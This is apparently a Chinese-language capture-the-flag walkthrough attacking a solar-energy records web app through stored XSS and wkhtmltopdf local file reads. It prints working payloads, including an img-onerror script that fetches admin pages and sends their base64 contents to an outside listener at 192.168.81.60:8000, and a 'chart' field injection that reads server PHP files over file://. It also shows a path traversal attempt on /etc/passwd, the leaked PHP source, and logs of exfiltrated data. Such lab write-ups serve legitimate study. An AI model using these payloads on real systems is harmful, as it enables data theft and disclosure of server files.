"chart":"\"><script>\np='/var/www/solar.nyx/records/index.php';\nx=new XMLHttpRequest;\nx.onerror=function(){{document.write('<p>'+p+' not found')}};\nx.onload=function(){{document.write('<p>'+p+'</p><div style=\"word-break: break-all;max-width:90%;\">'+btoa(this.responseText)+'</div>')}};\nx.open(\"GET\",\"file://\"+p);x.send();\n</script><x=\""
}

图片.png

利用xss漏洞检索一下看看有没有上传成功

{
  "solarEnergy": "<img src=x onerror=\"(async () => { location.href='http://192.168.81.60:8000/?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/')).arrayBuffer())));})(); \" />",
  "consumedEnergy": 15
}

192.168.81.83 - - [21/Mar/2025 11:02:42] "GET /?data=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+TGlzdCBvZiBTb2xhciBFbmVyZ3kgRGF0YTwvdGl0bGU+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii9zdHlsZS5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIvc3R5bGUzLmNzcyI+CjwvaGVhZD4KCjxib2R5PgogICAgPGRpdiBzdHlsZT0ibWluLXdpZHRoOjQwMHB4O2JhY2tncm91bmQ6d2hpdGU7cGFkZGluZzoxNXB4O2JvcmRlci1yYWRpdXM6IDhweDtib3gtc2hhZG93OiAwIDAgMTBweCByZ2JhKDAsIDAsIDAsIDAuMSk7Ij4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlcjsiPjxvYmplY3QgY2xhc3M9InNvbGFyLWljb24iIGRhdGE9Ii4uL3N1bi5zdmciIHR5cGU9ImltYWdlL3N2Zyt4bWwiIHN0eWxlPSJ3aWR0aDo3NXB4OyI+PC9vYmplY3Q+PC9kaXY+CiAgICAgICAgPGgxPkxpc3Qgb2YgU29sYXIgRW5lcmd5IERhdGE8L2gxPgogICAgICAgIDx0YWJsZT4KICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgPHRoPlJlY29yZDwvdGg+CiAgICAgICAgICAgICAgICA8dGg+QWN0aW9uczwvdGg+CiAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MTU6MTEuMzk2WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0ExNSUzQTExLjM5NlouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjE4OjE1Ljc0Mlo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMTglM0ExNS43NDJaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoxODo0NC4wOTFaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTE4JTNBNDQuMDkxWi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MjQ6MzMuODI4WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0EyNCUzQTMzLjgyOFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjI0OjQ0LjgwMFo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMjQlM0E0NC44MDBaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoyNToxNS45NjFaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTI1JTNBMTUuOTYxWi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6Mjk6MTQuMTI0WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0EyOSUzQTE0LjEyNFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI1LTAzLTIwVDIyOjEyOjQyLjM5MFo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI1LTAzLTIwVDIyJTNBMTIlM0E0Mi4zOTBaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNS0wMy0yMVQxNTowMDowNy41OTJaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNS0wMy0yMVQxNSUzQTAwJTNBMDcuNTkyWi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4KICAgICAgICA8YSBocmVmPSIuLi9kYXNoYm9hcmQucGhwIiBjbGFzcz0ibG9nb3V0LWxpbmsiPiZsdDsgQmFjazwvYT4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+ HTTP/1.1" 200 -

<html>
<head>
    <title>List of Solar Energy Data</title>
    <link rel="stylesheet" href="/style.css">
    <link rel="stylesheet" href="/style3.css">
</head>

<body>
    <div style="min-width:400px;background:white;padding:15px;border-radius: 8px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
        <div style="text-align:center;"><object class="solar-icon" data="../sun.svg" type="image/svg+xml" style="width:75px;"></object></div>
        <h1>List of Solar Energy Data</h1>
        <table>
            <tr>
                <th>Record</th>
                <th>Actions</th>
            </tr>
                            <tr>
                    <td>2024-09-02T23:15:11.396Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A15%3A11.396Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:18:15.742Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A15.742Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:18:44.091Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A44.091Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:33.828Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A33.828Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:44.800Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A44.800Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:25:15.961Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A25%3A15.961Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:29:14.124Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A29%3A14.124Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-20T22:12:42.390Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-20T22%3A12%3A42.390Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-21T15:00:07.592Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-21T15%3A00%3A07.592Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2025-03-21T15:13:15.584Z</td>
                    <td>
                        <a href="?download=true&file=2025-03-21T15%3A13%3A15.584Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                    </table>
        <a href="../dashboard.php" class="logout-link">&lt; Back</a>
    </div>
</body>
</html>
    </div>
</body>
</html>

发现有上传继续构建xss把pdf下载下来

{
  "solarEnergy": "<img src=x onerror=\"(async () => {location.href='http://192.168.81.60:8000?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2025-03-21T15%3A13%3A15.584Z.json')).arrayBuffer())));})();\" />",
  "consumedEnergy": 15
}

图片.png

<?php
include("../session.php");

if (!isset($_SESSION['username']) || empty($_SESSION['username']) || $_SESSION['role'] != 'admin') {
    header("Location: /index.php");
    exit();
}

$directory = __DIR__ . '/'; // Directorio donde se encuentran los archivos JSON

$files = glob($directory . '*.json');
usort($files, function ($a, $b) {
    return filemtime($b) - filemtime($a);
});

$filesToKeep = array_slice($files, 0, 10);
$filesToDelete = array_slice($files, 10);

foreach ($filesToDelete as $file) {
    if (is_file($file)) {
        unlink($file);
    }
}

$jsonFiles = glob($directory . '*.json'); 

function generatePDF($data, $filename)
{
    $html = '<html><head><title>Solar Energy Data</title><style>
    .energy-meter {
        margin: 20px auto;
        text-align: center;
    }
    h1 { text-align: center; }
    </style></head><body>';
    $html .= '<div style="text-align:center;"><br><br><img src="/var/www/solar.nyx/sun.svg" width="250" height="150"></div><br><br>';
    $html .= '<h1>Solar Energy Data<br><small>' . htmlspecialchars($data['time']) . '</small></h1><br><br><br><div class="energy-meter"><img src="' . ($data['chart']) . '" /></div><br>';
    $html .= '<table border="0" cellpadding="4" style="margin-left:auto;margin-right:auto;">
                <tr>
                    <th align="right">Registered by user</th>
                    <td>' . htmlspecialchars($data['user']['name']) . ' (' . htmlspecialchars($data['user']['role']) . ')</td>
                </tr>
                <tr> 
                    <th align="right">Solar</th>
                    <td>' . htmlspecialchars($data['solar']) . '</td>
                </tr>
                <tr>
                    <th align="right">Consumed</th>
                    <td>' . htmlspecialchars($data['consumed']) . '</td>
                </tr>
                <tr>
                    <th align="right">Grid</th>
                    <td>' . htmlspecialchars($data['grid']) . '</td>
                </tr>
              </table>';
    $html .= '</body></html>';

    $tempHtmlFile = tempnam(sys_get_temp_dir(), 'html_') . '.html';
    file_put_contents($tempHtmlFile, $html);

    $outputPdfFile = sys_get_temp_dir() . '/' . $filename;
    $command = escapeshellcmd("wkhtmltopdf --disable-local-file-access --allow /var/www/ $tempHtmlFile $outputPdfFile");

    $result = shell_exec($command . ' 2>&1');
    if ($result === null) {
        unlink($tempHtmlFile);
        throw new Exception('Error generate PDF: ' . $result);
    }

    unlink($tempHtmlFile);

    return $outputPdfFile;
}

if (isset($_GET['download']) && isset($_GET['file'])) {
    $file = basename($_GET['file']);
    $filePath = $directory . '/' . $file;

    if (file_exists($filePath) && pathinfo($filePath, PATHINFO_EXTENSION) === 'json') {
        $data = json_decode(file_get_contents($filePath), true);
        if ($data === null) {
            http_response_code(400);
            echo 'Error read JSON.';
            exit;
        }

        try {
            $pdfFile = generatePDF($data, basename($file, '.json') . '.pdf');
            header('Content-Type: application/pdf');
            header('Content-Disposition: attachment; filename="' . basename($pdfFile) . '"');
            readfile($pdfFile);
            unlink($pdfFile);
            exit;
        } catch (Exception $e) {
            http_response_code(500);
            echo 'Error generate PDF: ' . $e->getMessage();
            exit;
        }
    } else {
        http_response_code(404);
        echo 'File not found.';
        exit;
    }
}

?>
<!DOCTYPE html>
<html>

<head>
    <title>List of Solar Energy Data</title>
    <link rel="stylesheet" href="/style.css">
    <link rel="stylesheet" href="/style3.css">
</head>

<body>
    <div style="min-width:400px;background:white;padding:15px;border-radius: 8px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
        <div style="text-align:center;"><object class="solar-icon" data="../sun.svg" type="image/svg+xml" style="width:75px;"></object></div>
        <h1>List of Solar Energy Data</h1>
        <table>
            <tr>
                <th>Record</th>
                <th>Actions</th>
            </tr>
            <?php foreach ($jsonFiles as $file): ?>
                <tr>
                    <td><?php echo htmlspecialchars(pathinfo($file, PATHINFO_FILENAME)); ?></td>
                    <td>
                        <a href="?download=true&file=<?php echo urlencode(basename($file)); ?>" class="download-btn">Download PDF</a>
                    </td>
                </tr>
            <?php endforeach; ?>
        </table>
        <a href="../dashboard.php" class="logout-link">&lt; Back</a>
    </div>
</body>

</html>

观察代码发现可能有路径遍历攻击尝试下载passwd，无效

1	?download=true&file=../../../../etc/passwd

继续查看代码，找到了之前chart成功的原因，原来他会接收来自data的chart放到div中显示

1	$html .= '<h1>Solar Energy Data<br><small>' . htmlspecialchars($data['time']) . '</small></h1><br><br><br><div class="energy-meter"><img src="' . ($data['chart']) . '" /></div><br>';

继续，看到在执行wkhtmlopdf中只能读取/var/www/路径下的文件，知道目录结构

1	$command = escapeshellcmd("wkhtmltopdf --disable-local-file-access --allow /var/www/ $tempHtmlFile $outputPdfFile");

`wkhtmltopdf`	调用 `wkhtmltopdf` 命令行工具，将 HTML 转换为 PDF

`--disable-local-file-access`	禁止直接访问本地文件，防止 `file://` 读取服务器上的敏感文件（如 `/etc/passwd`）

`--allow /var/www/`	仅允许访问 `/var/www/` 目录，避免加载外部或敏感文件

`$tempHtmlFile`	输入的 HTML 文件（要转换为 PDF 的网页文件路径）

`$outputPdfFile`	生成的 PDF 输出文件路径

尝试读取gobuster之前扫到的一些目录,先去record里面发送js，再模拟单击，

这里思路乱掉了，忘记应该怎么获取文件了，应该是

1.尝试构建xss来伪造json数据

{
  "time": "2024-07-13T00:07:36.621Z",
  "user": {
    "name": "JulianAdm",
    "role": "admin"
  },
  "solar": 232,
  "consumed": 223,
  "grid": -9,
  "chart": "\"><script>\np='/var/www/sunfriends.nyx/server.php';\nx=new XMLHttpRequest;\nx.onerror=function(){{document.write('<p>'+p+' not found')}};\nx.onload=function(){{document.write('<p>'+p+'</p><div style=\"word-break: break-all;max-width:90%;\">'+btoa(this.responseText)+'</div>')}};\nx.open(\"GET\",\"file://\"+p);x.send();\n</script><x=\""
}

1
2

192.168.81.83 - - [21/Mar/2025 11:20:51] "GET /?data=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